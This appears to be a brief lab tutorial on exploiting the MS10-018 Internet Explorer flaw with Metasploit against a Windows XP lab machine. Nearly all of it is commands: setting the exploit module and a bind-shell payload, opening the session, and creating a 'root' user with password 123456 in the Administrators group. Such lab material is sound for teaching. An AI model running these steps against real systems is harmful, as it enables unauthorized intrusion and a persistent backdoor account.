Vulnerability details: https://technet.microsoft.com/library/security/ms10-018
I. Preparation:
1: Kali Linux system 192.168.195.129
2: Windows XP system 192.168.195.130
II. Operations on the Kali Linux system:
1: msfconsole (start Metasploit)
2: search ms10_018 (search for ms10_018)
3: use exploit/windows/browser/ms10_018_ie_behaviors (load the ms10_018 module)
1: set PAYLOAD windows/shell/bind_tcp (select and set the payload)
2: show options (view the required parameters)
1: set SRVHOST 192.168.195.129 (Kali's IP)
2: set URIPATH ms10_018.html
3: show options
1: exploit (attempt the attack)
1: sessions
2: setg LHOST 192.168.195.129
3: sessions -u 1
1: sessions -i 1 (interact with the session whose ID is 1)
2: ipconfig (view the Windows system's IP)
3: net user root 123456 /add (add the root user)
4: net localgroup Administrators root /add (add the root user to the Administrators group)
Reference: http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson11/